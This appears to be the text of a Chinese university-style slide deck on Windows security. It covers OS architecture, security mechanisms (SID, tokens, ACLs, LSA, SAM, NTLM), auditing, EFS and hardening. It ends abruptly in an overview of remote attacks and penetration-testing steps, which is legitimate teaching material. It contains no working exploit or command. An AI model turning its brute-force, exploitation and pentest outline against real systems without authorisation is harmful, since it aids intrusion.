這是一個關于網絡信息安全論文PPT課件，主要介紹1.Windows操作系統(tǒng)簡介、Windows的安全結構和機制、Windows系統(tǒng)遠程攻擊/Windows系統(tǒng)本地攻擊。Windows系統(tǒng)安全攻防技術內容 1.Windows操作系統(tǒng)簡介 2.Windows的安全結構和機制 3.Windows系統(tǒng)遠程攻擊 4.Windows系統(tǒng)本地攻擊桌面操作系統(tǒng)市場份額微軟Windows操作系統(tǒng)的市場占有率 Windows操作系統(tǒng)發(fā)展軌跡桌面(客戶端)操作系統(tǒng) 1990: Windows 3.x 1995-1999: Windows 95, 98, ME(4.x) 2000: Windows 2000 Pro(5.0.x) 2001: Windows XP(5.1.x) 2007: Windows Vista(6.0.x) 2009: Windows 7(6.1.x) 2012:Windows 8 (6.2.x) 服務器操作系統(tǒng) 1993: Windows NT (3.x, 4.x) 2000: Windows 2000 Server(5.0.x) 2003: Windows Server 2003 (5.2.x) 2008: Windows Server 2008 (6.x) Windows NT 5.x系列操作系統(tǒng) Windows 2000 Pro/Windows XP Windows 2000 Server/Windows Server 2003 簡化的Windows結構簡化的Windows結構注意到中間有一條線把Windows操作系統(tǒng)的用戶模式(user mode)和內核模式(kernel mode )兩部分劃分開來。線上面的方框代表了用戶模式的進程，線之下的組件是內核模式的操作系統(tǒng)服務。用戶模式的線程在一個受保護的進程地址空間中執(zhí)行(不過，當它們在內核模式中執(zhí)行的時候，它們可以訪問系統(tǒng)空間)，歡迎點擊下載網絡信息安全論文PPT課件哦。

網絡信息安全論文PPT課件是由紅軟PPT免費下載網推薦的一款學校PPT類型的PowerPoint.

Windows系統(tǒng)安全攻防技術內容 1.Windows操作系統(tǒng)簡介 2.Windows的安全結構和機制 3.Windows系統(tǒng)遠程攻擊 4.Windows系統(tǒng)本地攻擊桌面操作系統(tǒng)市場份額微軟Windows操作系統(tǒng)的市場占有率 Windows操作系統(tǒng)發(fā)展軌跡桌面(客戶端)操作系統(tǒng) 1990: Windows 3.x 1995-1999: Windows 95， 98， ME(4.x) 2000: Windows 2000 Pro(5.0.x) 2001: Windows XP(5.1.x) 2007: Windows Vista(6.0.x) 2009: Windows 7(6.1.x) 2012:Windows 8 (6.2.x) 服務器操作系統(tǒng) 1993: Windows NT (3.x， 4.x) 2000: Windows 2000 Server(5.0.x) 2003: Windows Server 2003 (5.2.x) 2008: Windows Server 2008 (6.x) Windows NT 5.x系列操作系統(tǒng) Windows 2000 Pro/Windows XP Windows 2000 Server/Windows Server 2003 簡化的Windows結構簡化的Windows結構注意到中間有一條線把Windows操作系統(tǒng)的用戶模式(user mode)和內核模式(kernel mode )兩部分劃分開來。線上面的方框代表了用戶模式的進程，線之下的組件是內核模式的操作系統(tǒng)服務。用戶模式的線程在一個受保護的進程地址空間中執(zhí)行(不過，當它們在內核模式中執(zhí)行的時候，它們可以訪問系統(tǒng)空間)。因此，系統(tǒng)支持進程、服務進程、用戶應用程序和環(huán)境子系統(tǒng)都有它們各自的私有進程地址空間�；�本的用戶模式進程(1) 固定的(或者硬性指定的)系統(tǒng)支持進程(system support processes)，比如登錄(logon)進程和會話管理器(session manager )，它們并不是Windows的服務。也就是說，它們不是由服務控制管理器來啟動的基本的用戶模式進程(2) 服務進程(service processes)負責的是Windows服務，比如任務調度器(Task Scheduler )和假脫機服務 Windows服務的運行通常要獨立于用戶登錄。許多Windows服務器應用，比如Microsoft SQL Server和Microsoft Exchange Server，也包含了一些以Windows服務方式來運行的組件； 基本的用戶模式進程(3) 用戶應用程序(user applications )有六種類型 Windows 32位 Windows 64位 Windows 3.1 16 位 MS-DOS 16位 POSIX 32位 OS/2 32位；基本的用戶模式進程(4) 環(huán)境子系統(tǒng)服務器進程(environment subsystem server processes)實現(xiàn)了操作系統(tǒng)環(huán)境的支持部分。所謂的環(huán)境是指操作系統(tǒng)展示給用戶或者程序員的個性化部分。 Windows NT發(fā)布時帶了三個不同的環(huán)境子系統(tǒng)：Windows、POSIX和OS/2 Windows XP，在基本的產品中只有 Windows子系統(tǒng)隨產品一起發(fā)布——不過，一個增強的POSIX 子系統(tǒng)也可以使用，它是針對Unix產品的免費服務的一部分。核心子系統(tǒng)DLL 在Windows下，用戶應用程序并不直接調用原始的Windows操作系統(tǒng)服務，相反，它們通過一個或者多個子系統(tǒng)動態(tài)鏈接庫(DLLs)來發(fā)起調用。子系統(tǒng)DLL 的角色是，將一個已文檔化的函數(shù)轉化為一些恰當?shù)膬炔?通常是未文檔化的)Windows系統(tǒng)服務調用。 Windows的內核模式組件(1) Windows執(zhí)行體(executive )包含了基本的操作系統(tǒng)服務，比如內存管理、進程和線程管理、安全性、I/O、網絡和跨進程通信。 Windows的內核模式組件(2) Windows內核(kernel )是由一組低層次的操作系統(tǒng)功能構成的，比如線程調度(thread scheduling)、中斷(interrupt )和異常分發(fā)(exception dispatching )，以及多處理器同步。它也提供了一組例程和基本對象。執(zhí)行體的其余部分利用這些例程和對象實現(xiàn)更高層次的功能。執(zhí)行體對象和內核對象 Windows的內核模式組件(3) 設備驅動程序(device drivers )既包括硬件設備驅動程序，也包括文件系統(tǒng)和網絡驅動程序。其中硬件設備驅動程序將用戶的I/O 函數(shù)調用轉換成特定的硬件設備I/O 請求。 Windows的內核模式組件(4) 硬件抽象層(HAL，Hardware Abstraction Layer)是指一層特殊的代碼，它把內核、設備驅動程序和Windows執(zhí)行體的其余部分，跟與平臺相關的硬件差異(比如不同主板的差異)隔離開來。 Windows的內核模式組件(5) 窗口和圖形系統(tǒng)(windowing and graphic system )實現(xiàn)了圖形用戶界面(GUI )函數(shù)(更為人們熟知的叫法是Windows USER和GDI 函數(shù))，比如對窗口的處理、用戶界面控件，以及繪制等。 Windows系統(tǒng)核心結構和組件 Windows的進程和線程管理 Windows下的進程和線程可執(zhí)行程序: 靜態(tài)指令序列進程：一個容器，包含至少一個執(zhí)行線程線程：進程內部的指令執(zhí)行實體 Windows進程 Windows進程的組成(從最高抽象層次看) 一個私有的虛擬地址空間一個可執(zhí)行的程序，定義了代碼和數(shù)據(jù)，并被映射到進程的虛擬地址空間一個已經打開句柄的列表指向各種資源，比如信號量、文件，該進程的所有線程都可訪問這些系統(tǒng)資源一個被稱為訪問令牌的安全環(huán)境標識與該進程關聯(lián)的用戶、安全組和特權一個被稱為進程ID的唯一標識至少一個執(zhí)行線程 Windows進程 Windows進程的關鍵數(shù)據(jù)結構執(zhí)行體進程塊(EPROCESS， Executive Process Block) 執(zhí)行體進程對象的對象體，包括進程ID、父進程ID、程序名、進程優(yōu)先級、內存管理信息、設備映像等。核心進程塊(KPROCESS， Kernel Process Block) 內核進程對象的對象體，又稱PCB，包括線程調度時需要的信息，如進程狀態(tài)、線程時間片等。進程環(huán)境塊(PEB， Process Environment Block) 包括用戶態(tài)代碼需要和修改的信息。 Windows環(huán)境子系統(tǒng)核心態(tài)部件win32k.sys為每個進程建立的進程信息數(shù)據(jù)結構WIN32KPROCESS Windows環(huán)境子系統(tǒng)進程csrss(用戶態(tài)空間)為每個進程建立的進程信息數(shù)據(jù)結構 Windows線程組成線程的基本部件一組代表處理器狀態(tài)的CPU寄存器中的內容兩個棧一個用于當線程在內核模式下執(zhí)行的時候，另一個用于線程在用戶模式下執(zhí)行的時候。一個被稱為線程局部存儲區(qū)(TLS， Thread Local Storage)的私有存儲區(qū)域各個子系統(tǒng)、運行庫和DLL都會用到該存儲區(qū)域一個被稱為線程ID的唯一標識符安全環(huán)境 Windows線程 Windows線程的關鍵數(shù)據(jù)結構執(zhí)行體線程塊(ETHREAD， Executive Thread Block) 執(zhí)行體線程對象的對象體，包括：進程ID、起始執(zhí)行地址、訪問令牌、LPC消息、定時器信息、KTHREAD等。核心線程塊(KTHREAD， Kernel Thread Block) 內核線程對象的對象體，包括線程調度信息、同步信息、核心棧信息等。線程環(huán)境塊(TEB， Thread Environment Block) 包括用戶態(tài)代碼需要和修改的信息。 Windows環(huán)境子系統(tǒng)核心態(tài)部件win32k.sys為每個線程建立的線程信息數(shù)據(jù)結構WIN32THREAD Windows環(huán)境子系統(tǒng)進程csrss(用戶態(tài)空間)為每個線程建立的線程信息數(shù)據(jù)結構 Windows進程線程模型 Windows進程線程模型 Windows進程線程內部數(shù)據(jù)結構 EPEOCESS & KPROCESS Windows進程線程內部數(shù)據(jù)結構 PEB Windows進程線程內部數(shù)據(jù)結構 ETHREAD & KTHREAD Windows進程線程內部數(shù)據(jù)結構 TEB Windows進程的創(chuàng)建過程與進程相關的函數(shù) Windows的內存管理 Windows虛擬地址空間 Windows系統(tǒng)核心內存區(qū)間 Windows內存空間 Windows虛擬地址空間虛擬地址空間(Virtual address space) A set of virtual memory addresses that a process can use. 特點平面(線形)空間大小和物理內存無關每個進程擁有的私有地址空間，其他的進程在未經允許的條件下不能訪問此地址空間 Windows虛擬地址空間 32-bit x86 地址空間虛擬地址空間最大為4GB Windows虛擬地址空間 Windows虛擬地址空間 64-bit Address Spaces Windows內存管理器 Windows的內存管理器是執(zhí)行體(Executive)的一部分，位于文件Ntoskrnl.exe中 Windows內存管理器內存管理器的主要任務將一個進程的虛擬地址空間映射到物理內存中(mapping)。數(shù)據(jù)交換(swap)。當物理內存被過度使用時，將內存中的一些內容轉移到磁盤上；并且，在以后需要這些內容時，再將它們讀回到物理內存中。 Windows內存管理器內存管理器提供的服務(面向用戶) 分配和釋放虛擬內存進程之間共享內存將文件映射到內存將虛擬頁面刷新到內存獲得虛擬頁面的信息改變虛擬頁面的保護屬性將虛擬頁面鎖在內存 …… Windows的內存管理方案 Windows內存管理采用的是虛擬頁式管理方案，默認情況下，每個頁面大小為4KB。 Windows頁面組織方式(二級頁表結構) 頁表(Page Table): A page of mapping information Windows的內存管理方案頁目錄(Page directory) Windows的內存管理方案 Windows虛擬地址變換 x86系統(tǒng)32位虛擬地址結構 Windows虛擬地址變換地址變換過程(x86系統(tǒng)) Windows頁面錯誤在頁面表換該過程中，可能會發(fā)現(xiàn)PTE的有效位被清除的情況，這表明出于某種原因，該頁面無法被當前進程訪問。在此對一個無效頁面的引用被稱為頁面錯誤(page fault) 引發(fā)錯誤的原因缺頁頁面在內存，但在備用或修改隊列中訪問違例 …… Windows頁面錯誤缺頁錯誤的處理方法采用請求調頁和頁簇化技術當發(fā)生缺頁中斷時，windows內存管理器將所需頁面及其之前或之后的少量頁面一起加載到內存中。根據(jù)程序行為局部性理論，這種頁簇化技術可以減少缺頁中斷次數(shù)。 Windows系統(tǒng)中如果缺頁的原因是因為引用數(shù)據(jù)頁面錯誤，則簇的大小為3，否則為7。不同的 Windows 版本支持內存數(shù) Win32 Process memory Windows文件系統(tǒng):FAT12，F(xiàn)AT16，F(xiàn)AT32 FAT（File Allocation Table，文件分配表）文件系統(tǒng)屬遺產文件系統(tǒng)。為了向后兼容，也為了方便用戶升級，Windows 2000/XP仍然提供對FAT的支持 每一種FAT文件系統(tǒng)都用一個數(shù)字來標識磁盤上簇號的位數(shù)。例如，F(xiàn)AT12的簇標識為12位（二進制數(shù)），這限制了它的單個分區(qū)最多只能存儲2 12（=4096）個簇，而FAT 12在Windows 2000/XP中的簇大小在512B與8KB之間，這意味著FAT12卷的大小至多只有32M。 FAT卷的結構: Boot Sector + FAT1 + FAT2 +Root +Other dirs and files FSD:\Winnt\System32\Drivers\Fastfat.sys Windows 2000/XP文件系統(tǒng)：NTFS NTFS是Windows 2000/XP的首選文件系統(tǒng) NTFS的簇標識為64位（二進制數(shù)）（但是Windows 2000有限制）文件與目錄的安全性文件與目錄的壓縮文件與目錄的加密文件與目錄的可恢復性。 NTFS系統(tǒng) NTFS的卷結構 NTFS卷中的文件名 使用NTFS文件系統(tǒng)管理資源 PE: Portable Executable 可移植的可執(zhí)行文件 (PE) 是一種用于可執(zhí)行文件、目標文件和動態(tài)鏈接庫的文件格式，主要使用在32位和64位的Windows操作系統(tǒng)上。 “可移植的”是指該文件格式的通用性，可用于許多種不同的操作系統(tǒng)和體系結構中。 PE文件格式封裝了Windows操作系統(tǒng)加載可執(zhí)行程序代碼時所必需的一些信息。這些信息包括動態(tài)鏈接庫、API導入和導出表、資源管理數(shù)據(jù)和線程局部存儲數(shù)據(jù)。 PE文件格式主要用于.exe文件、.dll文件、.sys（驅動程序）和其他文件類型(.cpl， .ocx， .scr， .drv)。 PE文件格式總結整個PE格式的組成：一個MS-DOS 的MZ 頭部，之后是一個實模式的殘余程序、PE 文件標志、PE 文件頭部、PE 可選頭部、所有的段頭部，最后是所有的段實體。可選頭部的末尾是一個數(shù)據(jù)目錄入口的數(shù)組，這些相對虛擬地址指向段實體之中的數(shù)據(jù)目錄。每個數(shù)據(jù)目錄都表示了一個特定的段實體數(shù)據(jù)是如何組織的。 PE 文件格式有9個預定義段，每個應用程序可以為它自己的代碼以及數(shù)據(jù)定義它自己獨特的段。 .debug 預定義段也可以分離為一個單獨的調試文件。如果這樣的話，就會有一個特定的調試頭部來用于解析這個調試文件，PE 文件中也會有一個標志來表示調試數(shù)據(jù)被分離了出去。 Windows系統(tǒng)的注冊表 Windows系統(tǒng)注冊表 Windows配置和控制方面關鍵角色系統(tǒng)全局配置的存儲倉庫每個用戶配置信息的存儲倉庫注冊表查找編輯工具 Regedit.exe 注冊表的讀寫讀取: 系統(tǒng)引導過程， 系統(tǒng)登錄過程， 應用程序啟動過程修改: 缺省安裝， 應用程序安裝， 設備驅動安裝， 修改應用程序配置注冊表在文件系統(tǒng)上的存儲(Hive) HKLM\SYSTEM\CurrentControlSet\Control\hivelist 注冊表監(jiān)視工具 RegMon 注冊表ASEP點自動啟動可擴展點 (ASEP) ASEP 可讓程序不經用戶操作即可啟動。一個 ASEP 可以接受一個或多個 ASEP 掛鉤，其中每個 ASEP 掛鉤與一個程序關聯(lián)。注冊表ASEP點經常被惡意代碼/攻擊者利用 Windows網絡體系結構網絡驅動程序接口規(guī)范層 NDIS Network Driver Interface Specification (NDIS) Layer NDIS提供從網絡傳輸系統(tǒng)到物理設備（如網絡適配器）的通信路徑。 NDIS扮演著網絡適配器和網絡協(xié)議之間的邊界層角色，管理這些組件之間的綁定工作。 NDIS增加了對面向連接網絡介質(例如ATM和ISDN)的支持，并繼續(xù)支持傳統(tǒng)的無連接網絡介質，如以太網、令牌環(huán)網、FDDI等。 NDIS包含直接和網絡適配器連接的微端口驅動程序。網絡協(xié)議層 Network Protocol Layer 網絡協(xié)議為客戶機提供服務，這些服務允許應用程序或客戶機通過網絡發(fā)送數(shù)據(jù)。網絡協(xié)議包括TCP/IP、ATM、IPX/SPX、NetBEUI、IrDA、AppleTalk和DLC。通過Microsoft的SNA Server，也可應用系統(tǒng)網絡體系結構(SNA)協(xié)議。傳輸驅動程序接口層 Transport Driver Interface Layer 傳輸驅動程序接口(TDI)在網絡協(xié)議和協(xié)議客戶機(如應用程序、網絡重定向器或網絡應用編程接口API)間提供了一個標準接口。網絡應用編程接口層 Network Application Programming Interface Layer 網絡應用編程接口API為網絡應用和服務提供標準編程接口。支持Winsock、NetBIOS、電話API(TAPI)、消息API(MAPI)、WNet API和其他服務。進程間通信層 Interprocess Communications Layer 進程間通信(IPC)支持客戶機/服務器計算和分布式處理。它們支持的服務有遠程過程調用(RPC)、分布式組件對象模型(DCOM)、命名管道、郵筒(mailslot)和通用Internet文件系統(tǒng)(CIFS)�；�本網絡服務層 Basic Network Services Layer 基本網絡服務層通過提供服務支持網絡用戶的應用程序。服務包括網絡地址管理、名字服務、文件服務和高級網絡服務，例如IPSec和QoS。 Windows的安全結構和機制 Windows安全性設計目標一致的、健壯的、基于對象的安全模型滿足商業(yè)用戶的安全需求， 達到CC評估標準EAL4 AAA: 身份驗證、授權、審計一臺機器上多個用戶之間安全地共享資源進程，內存，設備，文件，網絡安全模型服務器管理和保護各種對象客戶通過服務器訪問對象服務器扮演客戶，訪問對象訪問的結果返回給服務器攻擊者目標在擁有最高權限的用戶帳戶環(huán)境中執(zhí)行命令。引用監(jiān)控器模型引用監(jiān)控器與其他安全措施的關系模型 Windows 基礎的安全機制基于引用監(jiān)控器經典安全模型核心：內核中的SRM 安全引用監(jiān)控器用戶態(tài)中的LSASS(Local Security Authority Subsystem Service)安全服務其他 Winlogon/Netlogon/Eventlog 實現(xiàn)對主體用戶的身份認證機制、對所有對象的訪問控制機制，以及對訪問的安全審計機制 Winlogo進程與LSASS中的Netlogon分別負責Windows本地和遠程登錄用戶的身份認證，利用LSASS所提供的身份驗證服務，來確定安全主體身份的真實性。 內核中的安全引用監(jiān)控器，根據(jù)LSASS服務配置的安全訪問控制策略，負責對所有安全主題訪問Windows資源對象的授權訪問控制 安全引用監(jiān)控器根據(jù)LSASS服務配置的安全審計策略，對訪問過程中關注的事件進行記錄，并由EventLog生成系統(tǒng)審計日志。 Windows系統(tǒng)的安全組件訪問控制的判斷（Discretion access control） 允許對象所有者可以控制誰被允許訪問該對象以及訪問的方式。 對象重用（Object reuse） 當資源（內存、磁盤等）被某應用訪問時，Windows 禁止所有的系統(tǒng)應用訪問該資源，這也就是為什么無法恢復已經被刪除的文件的原因。 強制登錄（Mandatory log on） 要求所有的用戶必須登錄，通過認證后才可以訪問資源審核（Auditing） 在控制用戶訪問資源的同時，也可以對這些訪問作了相應的記錄。對象的訪問控制（Control of access to object） 不允許直接訪問系統(tǒng)的某些資源。必須是該資源允許被訪問，然后是用戶或應用通過第一次認證后再訪問。 Windows安全子系統(tǒng)的組件 安全標識符（Security Identifiers）: 就是我們經常說的SID，每次當我們創(chuàng)建一個用戶或一個組的時候，系統(tǒng)會分配給改用戶或組一個唯一SID，當你重新安裝系統(tǒng)后，也會得到一個唯一的SID。 SID永遠都是唯一的，由計算機名、當前時間、當前用戶態(tài)線程的CPU耗費時間的總和三個參數(shù)決定以保證它的唯一性。 例： S-1-5-21-1763234323-3212657521-1234321321-500 訪問令牌（Access tokens）: 用戶通過驗證后，登陸進程會給用戶一個訪問令牌，該令牌相當于用戶訪問系統(tǒng)資源的票證，當用戶試圖訪問系統(tǒng)資源時，將訪問令牌提供給Windows 系統(tǒng)，然后Windows NT檢查用戶試圖訪問對象上的訪問控制列表。如果用戶被允許訪問該對象，系統(tǒng)將會分配給用戶適當?shù)脑L問權限。 訪問令牌是用戶在通過驗證的時候有登陸進程所提供的，所以改變用戶的權限需要注銷后重新登陸，重新獲取訪問令牌。 Windows安全子系統(tǒng)的組件安全描述符（Security descriptors）： Windows 系統(tǒng)中的任何對象的屬性都有安全描述符這部分。它保存對象的安全配置。訪問控制列表（Access control lists）： 訪問控制列表有兩種：任意訪問控制列表（Discretionary ACL）、系統(tǒng)訪問控制列表（System ACL）。任意訪問控制列表包含了用戶和組的列表，以及相應的權限，允許或拒絕。每一個用戶或組在任意訪問控制列表中都有特殊的權限。而系統(tǒng)訪問控制列表是為審核服務的，包含了對象被訪問的時間。訪問控制項（Access control entries）: 訪問控制項（ACE）包含了用戶或組的SID以及對象的權限。訪問控制項有兩種：允許訪問和拒絕訪問。拒絕訪問的級別高于允許訪問。 Windows 安全子系統(tǒng) Windows安全子系統(tǒng) Winlogon and Gina: Winlogon調用GINA DLL，并監(jiān)視安全認證序列。而GINA DLL提供一個交互式的界面為用戶登陸提供認證請求。GINA DLL被設計成一個獨立的模塊，當然我們也可以用一個更加強有力的認證方式（指紋、視網膜）替換內置的GINA DLL。 Winlogon在注冊表中查找\HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon ，如果存在GinaDLL鍵，Winlogon將使用這個DLL，如果不存在該鍵，Winlogon將使用默認值MSGINA.DLL Windows安全子系統(tǒng)本地安全認證（Local Security Authority）： 本地安全認證（LSA）是一個被保護的子系統(tǒng)，它負責以下任務：調用所有的認證包，檢查在注冊表\HKLM\SYSTEM\CurrentControlSet\Control\LSA下AuthenticationPAckages下的值，并調用該DLL進行認證（MSV_1.DLL）。在4.0版里，Windows NT會尋找\HKLM\SYSTEM\CurrentControlSet\Control\LSA 下所有存在的SecurityPackages值并調用。重新找回本地組的SIDs和用戶的權限。創(chuàng)建用戶的訪問令牌。管理本地安裝的服務所使用的服務賬號。儲存和映射用戶權限。管理審核的策略和設置。管理信任關系。 Windows安全子系統(tǒng)安全支持提供者的接口（Security Support Provide Interface）： 微軟的Security Support Provide Interface很簡單地遵循RFC 2743和RFC 2744的定義，提供一些安全服務的API，為應用程序和服務提供請求安全的認證連接的方法。 認證包（Authentication Package）： 認證包可以為真實用戶提供認證。通過GINA DLL的可信認證后，認證包返回用戶的SIDs給LSA，然后將其放在用戶的訪問令牌中。 Windows安全子系統(tǒng)安全支持提供者（Security Support Provider）： 安全支持提供者是以驅動的形式安裝的，能夠實現(xiàn)一些附加的安全機制，默認情況下，Windows NT安裝了以下三種： Msnsspc.dll：微軟網絡挑戰(zhàn)/反應認證模塊 Msapsspc.dll：分布式密碼認證挑戰(zhàn)/反應模塊，該模塊也可以在微軟網絡中使用 Schannel.dll：該認證模塊使用某些證書頒發(fā)機構提供的證書來進行驗證，常見的證書機構比如Verisign。這種認證方式經常在使用SSL（Secure Sockets Layer）和PCT（Private Communication Technology）協(xié)議通信的時候用到。 Windows安全子系統(tǒng)網絡登錄（Netlogon）： 網絡登錄服務必須在通過認證后建立一個安全的通道。要實現(xiàn)這個目標，必須通過安全通道與域中的域控制器建立連接，然后，再通過安全的通道傳遞用戶的口令，在域的域控制器上響應請求后，重新取回用戶的SIDs和用戶權限。 安全賬號管理者（Security Account Manager）： 安全賬號管理者，也就是我們經常所說的SAM，它是用來保存用戶賬號和口令的數(shù)據(jù)庫。保存了注冊表中\(zhòng)HKLM\Security\Sam中的一部分內容。不同的域有不同的Sam，在域復制的過程中，Sam包將會被拷貝。 Windows的密碼系統(tǒng) Windows NT及Win2000中對用戶帳戶的安全管理使用了安全帳號管理器(security account manager)的機制，安全帳號管理器對帳號的管理是通過安全標識進行的，安全標識在帳號創(chuàng)建時就同時創(chuàng)建，一旦帳號被刪除，安全標識也同時被刪除。安全標識是唯一的，即使是相同的用戶名，在每次創(chuàng)建時獲得的安全標識都時完全不同的。因此，一旦某個帳號被刪除，它的安全標識就不再存在了，即使用相同的用戶名重建帳號，也會被賦予不同的安全標識，不會保留原來的權限。 Windows登錄驗證模型 Windows NT/2000/XP的系統(tǒng)登錄過程登錄是通過登錄進程WinLogon、LSA、一個或多個身份認證包和SAM的相互作用發(fā)生的身份認證包：執(zhí)行身份驗證檢查的動態(tài)鏈接庫。 Msvl_0：用于交互式登錄的身份認證包 WinLogon：一個受托進程，負責管理與安全性相關的用戶相互作用是從鍵盤截取登錄請求的唯一進程 Windows登錄驗證過程（以NT為例） Windows遠程登錄身份驗證早期：SMB驗證協(xié)議，在網絡上傳輸明文口令 LM LM Manager Challenge/Response驗證機制 驗證機制簡單，容易被破解 NTLM Windows NT挑戰(zhàn)/響應驗證機制 NTLM v2 Kerberos Network Authentication，以NTLM為例 Windows安全技術 Windows NT/2000/XP中的常用安全技術 Windows身份驗證與訪問控制 Windows審核機制 Windows注冊表 Windows加密文件系統(tǒng) Windows基準安全注意事項 Windows Audit機制 Windows 2000默認安裝沒有打開任何安全審計 控制面板 管理工具 本地安全策略 本地策略 審計策略以賬戶管理事件為例創(chuàng)建（624）和啟用（626）賬戶更改賬戶密碼（627，628）更改賬戶狀態(tài)（629，630）對安全組的修改（632，633；636，637）賬戶鎖定（644，642） 一旦打開上述審計事件，安全審計就會將相關事件在事件查看器的日志中記錄下來修改審計策略后，要重啟機器。對文件和文件夾的審計必要條件 NTFS 打開“對象訪問”事件審核策略 審核設置步驟 ”右鍵“待審核文件文件夾，”屬性“”安全“”高級“”審核”“添加”“確定” 選擇“審核項目” 6種審計日志應用程序日志應用程序和系統(tǒng)產生的事件系統(tǒng)日志操作系統(tǒng)自身產生的事件，包括驅動等組件安全日志安全事件相關信息例如：與監(jiān)視系統(tǒng)、用戶和進程活動相關的信息；啟動失敗等安全服務相關信息目錄服務日志文件復制日志 DNS服務日志事件查看器審計系統(tǒng)服務對象管理器有效的Win32函數(shù) 調用審計系統(tǒng)服務的進程必須具有SeAuditPrivilege特權 可以防止惡意“淹沒”“安全日志” Windows系統(tǒng)的審計數(shù)據(jù)二進制結構文件形式存于物理磁盤每條記錄：事件發(fā)生事件事件源 Windows安全技術 Windows NT/2000/XP中的常用安全技術 Windows身份驗證與訪問控制 Windows審核機制 Windows注冊表 Windows加密文件系統(tǒng) Windows基準安全注意事項 Windows的注冊表早期，對系統(tǒng)環(huán)境的配置通過*.ini進行 Windows95之后，注冊表 注冊表是一種數(shù)據(jù)庫集中存儲各種信息資源，包括各種配置信息 注冊表的“鍵”和“鍵值” 注冊表編輯器：樹型 系統(tǒng)定義關鍵字（預定義關鍵字）應用程序定義關鍵字鍵值：值的名稱＋值的數(shù)據(jù)類型＋值系統(tǒng)預定義的5個組關鍵字 HKEY_CLASSES_ROOT HKEY_CURRENT_USER HKEY_LOCAL_MACHINE HKEY_USERS HKEY_CURRENT_CONFIG HKEY_CLASSES_ROOT HKEY_CURRENT_USER HKEY_LOCAL_MACHINE 用來控制系統(tǒng)和軟件的設置針對所有用戶，是公共配置信息，與具體用戶無關 5個子鍵 HKEY_USERS 各個用戶相關的設置桌面、背景、開始菜單程序項、等等 HKEY_CURRENT_CONFIG 計算機的當前配置情況顯示器、打印機等可選外部設備及其配置信息 … 注冊表的備份與恢復導出導入注冊表安全默認，注冊表的安全級別較高管理員：完全訪問權限其他用戶：自己用戶賬戶相關的特權指派 Windows安全技術 Windows NT/2000/XP中的常用安全技術 Windows身份驗證與訪問控制 Windows審核機制 Windows注冊表 Windows加密文件系統(tǒng) Windows基準安全注意事項 Windows加密文件系統(tǒng)加密文件系統(tǒng)，Encrypted File System，EFS 用于在NTFS上存儲已加密的文件加密過程對用戶透明與使用未加密文件和文件夾一樣 文件/文件夾（推薦）加密屬性加密示例命令行加密命令cipher EFS注意點只有NTFS上的文件和文件夾才能被加密不能加密壓縮的文件或文件夾加密的文件被復制或移動到非NTFS格式的卷上，會被解密非加密文件移動到加密文件夾中，自動加密。 反之不成立。 “系統(tǒng)”屬性的文件，無法加密。位于%SYSTEMROOT%目錄結構中的文件，也是如此加密文件或文件夾不能防止刪除/列出文件/目錄建議結合NTFS的訪問控制來使用EFS 在允許進行遠程加密的遠程計算機上可以加密/解密文件/目錄。但，在網絡上傳輸?shù)臄?shù)據(jù)并未加密 EFS 對稱加密技術＋非對稱加密技術文件加密密鑰與用戶的EFS證書對應的公鑰 EFS的故障恢復策略故障恢復代理 指獲得授權解密由其他用戶加密的數(shù)據(jù)的個人 Windows安全技術 Windows NT/2000/XP中的常用安全技術 Windows身份驗證與訪問控制 Windows審核機制 Windows注冊表 Windows加密文件系統(tǒng) Windows基準安全注意事項 Windows基準安全注意事項驗證所有磁盤分區(qū)是否都用NTFS格式化禁用不必要的服務禁用或刪除不必要的賬戶確保禁用來賓（guest）賬戶防止注冊表被匿名訪問限制對LSA信息進行訪問設置密碼策略設置賬戶鎖定策略配置管理員賬戶安裝防毒軟件和更新安裝最新的Service Pack 安裝適當?shù)腟ervice Pack后的安全修補程序補充安全設置 Windows 系統(tǒng)遠程攻防技術基本遠程攻擊技術遠程口令猜測與破解攻擊暴力破解基于字典的猜測中間人身份認證欺騙攻擊攻擊Windows網絡服務利用Windows系統(tǒng)的網絡服務程序的漏洞進行遠程滲透攻擊攻擊Windows客戶端及用戶利用瀏覽器及應用軟件客戶端進行滲透攻擊 Windows系統(tǒng)的安全漏洞生命周期安全漏洞 Security Vulnerability，安全脆弱性一般認為，漏洞是指硬件、軟件或策略上存在的的安全缺陷，從而使得攻擊者能夠在未授權的情況下訪問、控制系統(tǒng) Windows安全漏洞發(fā)現(xiàn)、利用與修補黑白道上的人致力于軟件安全性分析研究，發(fā)掘Windows操作系統(tǒng)組件、網絡服務以及第三方軟件中存在的安全漏洞。安全漏洞的披露方式軟件廠商 向公眾披露軟件缺陷將為攻擊者開發(fā)漏洞滲透攻擊代碼和制作惡意代碼提供幫助安全研究人員廠商希望掩蓋其失誤，公開披露漏洞信息將使企業(yè)和個人能夠更好地保護他們的系統(tǒng)。不穩(wěn)定的妥協(xié)安全研究人員向廠商通報漏洞信息，等待廠商公布補丁軟件后再向公眾公開，廠商則給予研究人員相應的榮譽。 Windows安全漏洞 Windows安全漏洞發(fā)布 Microsoft Security Bulletin: http://www.microsoft.com/technet/security/current.aspx 微軟安全公告: http://www.microsoft.com/china/technet/security/current.mspx 微軟安全漏洞編號方式: MSXX(年份編號)-0XX(漏洞發(fā)布次序) 遠程滲透可利用的安全漏洞安全漏洞后果類型: 遠程執(zhí)行代碼安全漏洞危害等級: 重要或嚴重本地滲透可利用的安全漏洞安全漏洞后果類型: 本地特權提升安全漏洞危害等級: 重要或嚴重當前的漏洞趨勢每年公布的漏洞數(shù)量 總結當前的許多攻擊受到經濟利益驅使 Web應用程序漏洞占一半比例瀏覽器漏洞下降，但插件帶來更多地威脅在對抗共同攻擊方面有所進展移動平臺受到更多的關注如何對特定目標進行遠程滲透測試? 漏洞掃描: 確定目標系統(tǒng)存在哪些已知漏洞 Nessus/XScan/… 如何查看漏洞掃描結果安全漏洞索引: Nessus ID –MS安全漏洞編號–CVE安全漏洞編號–BID編號 Nessus ID 19402 -> MS05-039 -> CVE-2005-1983 -> BID 14513 了解安全漏洞細節(jié)信息根據(jù)安全漏洞編號找出安全漏洞具體描述信息安全漏洞影響軟件范圍、攻擊目標服務、具體位置、后果類型、嚴重等級… 如何對特定目標進行遠程滲透測試? 查找已知安全漏洞的滲透攻擊代碼黑客社區(qū)重要的共享資源并非每個已知安全漏洞都存在公開滲透代碼軟件流行度、漏洞危害后果類型和等級: 滲透代碼價值安全漏洞補丁情況: 滲透代碼的有效性安全漏洞利用難度: 